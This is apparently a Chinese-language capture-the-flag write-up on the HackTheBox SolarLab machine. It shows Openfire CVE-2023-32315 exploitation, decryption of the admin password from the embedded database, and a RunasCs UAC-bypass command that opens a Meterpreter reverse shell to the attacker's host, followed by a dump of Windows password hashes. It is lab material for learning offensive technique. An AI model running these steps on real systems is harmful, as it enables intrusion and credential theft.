    tcp    127.0.0.1:49702    127.0.0.1:49701   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49703    127.0.0.1:49704   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49704    127.0.0.1:49703   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49705    127.0.0.1:49706   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49706    127.0.0.1:49705   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49707    127.0.0.1:49708   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49708    127.0.0.1:49707   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49709    127.0.0.1:49710   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49710    127.0.0.1:49709   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49711    127.0.0.1:49712   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49712    127.0.0.1:49711   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49713    127.0.0.1:49714   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49714    127.0.0.1:49713   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49715    127.0.0.1:49716   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49716    127.0.0.1:49715   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:59118    127.0.0.1:59119   ESTABLISHED  0     0      5068/python3.11.exe
    tcp    127.0.0.1:59119    127.0.0.1:59118   ESTABLISHED  0     0      5068/python3.11.exe
    tcp    127.0.0.1:59130    127.0.0.1:5000    FIN_WAIT2    0     0      5736/nginx.exe
    tcp    127.0.0.1:59133    127.0.0.1:9090    TIME_WAIT    0     0      0/[System Process]
    tcp    127.0.0.1:59134    127.0.0.1:9090    TIME_WAIT    0     0      0/[System Process]
    tcp6   :::135             :::*              LISTEN       0     0      904/svchost.exe
    tcp6   :::445             :::*              LISTEN       0     0      4/System
    tcp6   :::5985            :::*              LISTEN       0     0      4/System
    tcp6   :::47001           :::*              LISTEN       0     0      4/System
    tcp6   :::49664           :::*              LISTEN       0     0      664/lsass.exe
    tcp6   :::49665           :::*              LISTEN       0     0      532/wininit.exe
    tcp6   :::49666           :::*              LISTEN       0     0      628/svchost.exe
    tcp6   :::49667           :::*              LISTEN       0     0      1608/svchost.exe
    tcp6   :::49668           :::*              LISTEN       0     0      656/services.exe
    udp    0.0.0.0:123        0.0.0.0:*                      0     0      5952/svchost.exe
    udp    0.0.0.0:500        0.0.0.0:*                      0     0      2568/svchost.exe
    udp    0.0.0.0:4500       0.0.0.0:*                      0     0      2568/svchost.exe
    udp    0.0.0.0:5050       0.0.0.0:*                      0     0      1336/svchost.exe
    udp    0.0.0.0:5353       0.0.0.0:*                      0     0      1936/svchost.exe
    udp    0.0.0.0:5355       0.0.0.0:*                      0     0      1936/svchost.exe
    udp    10.10.11.16:137    0.0.0.0:*                      0     0      4/System
    udp    10.10.11.16:138    0.0.0.0:*                      0     0      4/System
    udp    10.10.11.16:1900   0.0.0.0:*                      0     0      5016/svchost.exe
    udp    10.10.11.16:62302  0.0.0.0:*                      0     0      5016/svchost.exe
    udp    127.0.0.1:1900     0.0.0.0:*                      0     0      5016/svchost.exe
    udp    127.0.0.1:57769    0.0.0.0:*                      0     0      2980/svchost.exe
    udp    127.0.0.1:62303    0.0.0.0:*                      0     0      5016/svchost.exe
    udp6   :::123             :::*                           0     0      5952/svchost.exe
    udp6   :::500             :::*                           0     0      2568/svchost.exe
    udp6   :::4500            :::*                           0     0      2568/svchost.exe
    udp6   ::1:1900           :::*                           0     0      5016/svchost.exe
    udp6   ::1:62301          :::*                           0     0      5016/svchost.exe

发现了openfire 的服务 之前Jab靶机也有这个服务

CVE-2023-32315

https://github.com/miko550/CVE-2023-32315

openfire 后台可以进入并且进行上传一个而已的jar包getshell

在版本范围 4.7.0< 版本 < 4.7.5 直接存在身份绕过漏洞,可以创建一个新用户

img

之后上传github里面的shell jar包

img

img

img

img

PS C:\Program Files\Openfire\bin> type  .\extra\embedded-db-viewer.bat
type  .\extra\embedded-db-viewer.bat
@echo off

REM # Script to start the HSQLDB database viewer. The embedded-db.rc file
REM # contains connection settings. Visit http://hsqldb.org for documentation
REM # on using the tool. The classpath includes JDBC drivers shipped with Openfire
REM # to work with the Transfer tool. You will need to add any other JDBC driver
REM # that you'd like to use with the transfer tool to the classpath manually.

SET CLASSPATH=%~dp0..\..\lib\*

echo Starting embedded database viewer...

java -cp %CLASSPATH% org.hsqldb.util.DatabaseManagerSwing --rcfile embedded-db.rc --urlid embedded-db
PS C:\Program Files\Openfire\bin> type .\extra\embedded-db.rc
type .\extra\embedded-db.rc
# Connection settings for the embedded Openfire database.
urlid embedded-db
url jdbc:hsqldb:../../embedded-db/openfire
username sa
password
PS C:\Program Files\Openfire\bin>       

    Directory: C:\Program Files\Openfire

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        11/17/2023   2:11 PM                .install4j
d-----         5/17/2024  10:37 AM                bin
d-----         5/17/2024   8:59 AM                conf
d-----        11/17/2023   2:11 PM                documentation
d-----         5/17/2024  10:27 AM                embedded-db
d-----        11/17/2023   2:11 PM                lib
d-----        11/17/2023   2:24 PM                logs
d-----         5/17/2024  10:34 AM                plugins
d-----        11/17/2023   2:11 PM                resources
-a----         11/9/2022   5:59 PM         375002 changelog.html
-a----         2/16/2022   5:55 PM          10874 LICENSE.html
-a----         2/16/2022   5:55 PM           5403 README.html
-a----         11/9/2022   6:00 PM         798720 uninstall.exe

PS C:\Program Files\Openfire> 来ls embedded-db
ls embedded-db

    Directory: C:\Program Files\Openfire\embedded-db

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         5/17/2024   8:59 AM                openfire.tmp
-a----         5/17/2024   8:59 AM              0 openfire.lck
-a----         5/17/2024  10:35 AM           6667 openfire.log
-a----         5/17/2024   8:59 AM            106 openfire.properties
-a----          5/7/2024   9:15 PM          16161 openfire.script
-a----         5/17/2024  10:27 AM              0 RunasCs.exe

openfire.script 这个文件是sql 语句脚本

img

字段结构是这样

➜  openfire cat openfire.script|grep -i ofuser
CREATE MEMORY TABLE PUBLIC.OFUSER(USERNAME VARCHAR(64) NOT NULL,STOREDKEY VARCHAR(32),SERVERKEY VARCHAR(32),SALT VARCHAR(32),ITERATIONS INTEGER,PLAINPASSWORD VARCHAR(32),ENCRYPTEDPASSWORD VARCHAR(255),NAME VARCHAR(100),EMAIL VARCHAR(100),CREATIONDATE VARCHAR(15) NOT NULL,MODIFICATIONDATE VARCHAR(15) NOT NULL,CONSTRAINT OFUSER_PK PRIMARY KEY(USERNAME))
CREATE INDEX OFUSER_CDATE_IDX ON PUBLIC.OFUSER(CREATIONDATE)
CREATE MEMORY TABLE PUBLIC.OFUSERPROP(USERNAME VARCHAR(64) NOT NULL,NAME VARCHAR(100) NOT NULL,PROPVALUE VARCHAR(4000) NOT NULL,CONSTRAINT OFUSERPROP_PK PRIMARY KEY(USERNAME,NAME))
CREATE MEMORY TABLE PUBLIC.OFUSERFLAG(USERNAME VARCHAR(64) NOT NULL,NAME VARCHAR(100) NOT NULL,STARTTIME VARCHAR(15),ENDTIME VARCHAR(15),CONSTRAINT OFUSERFLAG_PK PRIMARY KEY(USERNAME,NAME))
CREATE INDEX OFUSERFLAG_STIME_IDX ON PUBLIC.OFUSERFLAG(STARTTIME)
CREATE INDEX OFUSERFLAG_ETIME_IDX ON PUBLIC.OFUSERFLAG(ENDTIME)
INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4YeyZDdns5gvXp620=','yidQk5Skw11QJWTBAloAb28lYHftqa0x',4096,NULL,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','admin@solarlab.htb','001700223740785','0')
INSERT INTO OFUSERPROP VALUES('admin','console.rows_per_page','/session-summary.jsp=25')
INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4YeyZDdns5gvXp620=','yidQk5Skw11QJWTBAloAb28lYHftqa0x',4096,NULL,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','admin@solarlab.htb','001700223740785','0')

插入的值是

➜  openfire cat openfire.script|grep -i prop
CREATE MEMORY TABLE PUBLIC.OFUSERPROP(USERNAME VARCHAR(64) NOT NULL,NAME VARCHAR(100) NOT NULL,PROPVALUE VARCHAR(4000) NOT NULL,CONSTRAINT OFUSERPROP_PK PRIMARY KEY(USERNAME,NAME))
CREATE MEMORY TABLE PUBLIC.OFGROUPPROP(GROUPNAME VARCHAR(50) NOT NULL,NAME VARCHAR(100) NOT NULL,PROPVALUE VARCHAR(4000) NOT NULL,CONSTRAINT OFGROUPPROP_PK PRIMARY KEY(GROUPNAME,NAME))
CREATE MEMORY TABLE PUBLIC.OFPROPERTY(NAME VARCHAR(100) NOT NULL,PROPVALUE VARCHAR(4000) NOT NULL,ENCRYPTED INTEGER,IV CHARACTER(24),CONSTRAINT OFPROPERTY_PK PRIMARY KEY(NAME))
CREATE MEMORY TABLE PUBLIC.OFMUCSERVICEPROP(SERVICEID BIGINT NOT NULL,NAME VARCHAR(100) NOT NULL,PROPVALUE VARCHAR(4000) NOT NULL,CONSTRAINT OFMUCSERVICEPROP_PK PRIMARY KEY(SERVICEID,NAME))
CREATE MEMORY TABLE PUBLIC.OFMUCROOMPROP(ROOMID BIGINT NOT NULL,NAME VARCHAR(100) NOT NULL,PROPVALUE VARCHAR(4000) NOT NULL,CONSTRAINT OFMUCROOMPROP_PK PRIMARY KEY(ROOMID,NAME))
INSERT INTO OFUSERPROP VALUES('admin','console.rows_per_page','/session-summary.jsp=25')
INSERT INTO OFPROPERTY VALUES('cache.MUCService''conference''RoomStatistics.maxLifetime','-1',0,NULL)
INSERT INTO OFPROPERTY VALUES('cache.MUCService''conference''RoomStatistics.size','-1',0,NULL)
INSERT INTO OFPROPERTY VALUES('cache.MUCService''conference''Rooms.maxLifetime','-1',0,NULL)
INSERT INTO OFPROPERTY VALUES('cache.MUCService''conference''Rooms.size','-1',0,NULL)
INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL)
INSERT INTO OFPROPERTY VALUES('provider.admin.className','org.jivesoftware.openfire.admin.DefaultAdminProvider',0,NULL)
INSERT INTO OFPROPERTY VALUES('provider.auth.className','org.jivesoftware.openfire.auth.DefaultAuthProvider',0,NULL)
INSERT INTO OFPROPERTY VALUES('provider.group.className','org.jivesoftware.openfire.group.DefaultGroupProvider',0,NULL)
INSERT INTO OFPROPERTY VALUES('provider.lockout.className','org.jivesoftware.openfire.lockout.DefaultLockOutProvider',0,NULL)
INSERT INTO OFPROPERTY VALUES('provider.securityAudit.className','org.jivesoftware.openfire.security.DefaultSecurityAuditProvider',0,NULL)
INSERT INTO OFPROPERTY VALUES('provider.user.className','org.jivesoftware.openfire.user.DefaultUserProvider',0,NULL)
INSERT INTO OFPROPERTY VALUES('provider.vcard.className','org.jivesoftware.openfire.vcard.DefaultVCardProvider',0,NULL)
INSERT INTO OFPROPERTY VALUES('update.lastCheck','1715023572956',0,NULL)
INSERT INTO OFPROPERTY VALUES('xmpp.auth.anonymous','false',0,NULL)
INSERT INTO OFPROPERTY VALUES('xmpp.domain','solarlab.htb',0,NULL)
INSERT INTO OFPROPERTY VALUES('xmpp.proxy.enabled','false',0,NULL)
INSERT INTO OFPROPERTY VALUES('xmpp.socket.ssl.active','true',0,NULL)
passwordkey = hGXiFzsKaAeYLjn

encryptedPassword  =becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442

openfire_decrypt

Referer:https://github.com/jas502n/OpenFire_Decrypt

img

➜  target git:(main) ls
OpenFire-1.0-SNAPSHOT-jar-with-dependencies.jar  OpenFire-1.0-SNAPSHOT.jar
➜  target git:(main) java -jar OpenFire-1.0-SNAPSHOT-jar-with-dependencies.jar
__________________________________________
OpenFire 管理后台账号密码解密
encryptedPassword =>> 后台用户的密码
passwordKey =>> 安装生成的秘钥

[+] encryptedPassword= becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442
[+] passwordKey= hGXiFzsKaAeYLjn
[+] Password =>> ThisPasswordShouldDo!@

成功解密得到admin的密码

RunasCs

\Openfire\bin> .\RunasCs.exe administrator 'ThisPasswordShouldDo!@' "cmd /c C:/users/public/shell.exe" --bypass-uac
.\RunasCs.exe administrator 'ThisPasswordShouldDo!@' "cmd /c C:/users/public/documents/shell.exe" --bypass-uac

[*] Sending stage (200774 bytes) to 10.10.11.16
[*] Meterpreter session 3 opened (10.10.16.10:4444 -> 10.10.11.16:60198) at 2024-05-17 16:29:27 +0800
                                                                                                          

img

Hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c032ae85d6995c0bb4999ec869d90cf:::
blake:1000:aad3b435b51404eeaad3b435b51404ee:4cf570cdca082077b0e61addac8b7705:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
openfire:1001:aad3b435b51404eeaad3b435b51404ee:a22c1b83fa00c6030969caf37a5e061b:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:57da9863751e0fd175f042bc41aec9b2:::
meterpreter >

In summary

User :

smb enmu → detail-file.xlsx (password backup file) → 6791 bruteforce password → blaked → reportlab (html2Pdf RCE)

Root:

openfire → chisel socks → cve-2023-32315 add new user → add new plugins → rce → decrypt openfire administrator password

User

https://github.com/c53elyas/CVE-2023-33733

https://security.snyk.io/vuln/SNYK-PYTHON-REPORTLAB-5664897

Root

https://github.com/miko550/CVE-2023-32315

https://github.com/jas502n/OpenFire_Decrypt

  • 25
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Som3B0dy

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值